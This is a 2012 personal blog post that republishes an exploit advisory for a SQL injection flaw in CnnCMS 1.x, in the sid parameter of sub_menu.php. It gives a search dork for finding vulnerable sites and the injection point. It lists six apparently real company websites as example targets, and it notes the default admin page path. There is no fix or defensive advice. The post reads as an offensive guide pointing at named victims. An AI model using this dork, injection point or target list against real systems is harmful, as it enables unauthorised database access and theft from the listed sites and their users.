.: Dee Personal Blog :.

Subtitle

Blog

CnnCMS 1.x SQL Injection Vulnerability

Posted on March 3, 2012 at 12:15 PM

=========================================================================

CnnCMS 1.x SQL Injection Vulnerability

=========================================================================

 :-------------------------------------------------------------------------------------------------------------------------:

# Exploit Title : CnnCMS 1.x SQL Injection Vulnerability

# Date : March 3rd 2012

# Author : X-Cisadane

# Software Link : http://www.thinknolimits.com/

# Version : 1.x

# Category : Web Applications

# Vulnerability : SQL Injection

# Tested On : Google Chrome 14.0.835 (Windows)

# Dorks : inurl:sub_menu.php?sid=

# Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Explore Crew, Winda Utari

:-------------------------------------------------------------------------------------------------------------------------:
 

SQL Injection Vulnerability  :
- Open Victim Website : http://[Site]/[Cnn CMS Path]/sub_menu.php?sid=-[SQL]


Example :

 

http://garden-goldenteakfurniture.com/sub_menu.php?sid=-13 ;
http://lunar.co.id/sub_menu.php?sid=-1 ;
http://www.djawaleather.com/sub_menu.php?sid=-1 ;
http://www.gravigra.com/sub_menu.php?sid=-1 ;
http://www.harpagreen.com/sub_menu.php?sid=-2 ;
http://www.suwastama.co.id/sub_menu.php?sid=-1

 


Admin Page (Default) : http://[Site]/[Cnn CMS Path]/admin/

 

Categories: Exploit

Post a Comment

Oops!

Oops, you forgot something.

Oops!

The words you entered did not match the given text. Please try again.

You must be a member to comment on this page. Sign In or Register

0 Comments